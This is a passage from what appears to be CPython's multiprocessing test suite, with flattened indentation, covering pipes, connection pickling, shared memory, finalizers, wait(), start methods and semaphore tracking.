conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=5)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL1, reader.recv())
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.daemon = True
p.start()
self.assertEqual(LEVEL2, reader.recv())
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
def initializer(ns):
ns.test += 1
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process(q):
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=_test_process, args=(queue,))
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.time()
res = wait([a, b], expected)
delta = time.time() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.time()
res = wait([a, b], 20)
delta = time.time() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.time()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.time() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.time()
res = wait([a, p.sentinel, b], 20)
delta = time.time() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.time()
res = wait([a], timeout=-1)
t = time.time() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json, subprocess
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
p.join(10)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recurisvely start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
p.join(timeout=5)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
p.join(timeout=5)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
p.join(timeout=5)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x'*(1024*1024)) # sending 1 MB should block
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x'*(1024*1024))
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
#
# Check that killing process does not leak named semaphores
#
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestSemaphoreTracker(unittest.TestCase):
def test_semaphore_tracker(self):
import subprocess
cmd = '''if 1:
import multiprocessing as mp, time, os
mp.set_start_method("spawn")
lock1 = mp.Lock()
lock2 = mp.Lock()
os.write(%d, lock1._semlock.name.encode("ascii") + b"\\n")
os.write(%d, lock2._semlock.name.encode("ascii") + b"\\n")
time.sleep(10)
'''
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-c', cmd % (w, w)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_multiprocessing.sem_unlink(name1)
p.terminate()
p.wait()
time.sleep(2.0)
with self.assertRaises(OSError) as ctx:
_multiprocessing.sem_unlink(name2)
# docs say it should be ENOENT, but OSX seems to give EINVAL
self.assertIn(ctx.exception.errno, (errno.ENOENT, errno.EINVAL))
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = 'semaphore_tracker: There appear to be 2 leaked semaphores'
self.assertRegex(err, expected)
self.assertRegex(err, 'semaphore_tracker: %r: \[Errno' % name1)
#
# Mixins
#
class ProcessesMixin(object):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(object):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
t = 0.01
while len(multiprocessing.active_children()) > 1 and t < 5:
time.sleep(t)
t *= 2
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
print('Shared objects which still exist at manager shutdown:')
print(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
class ThreadsMixin(object):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
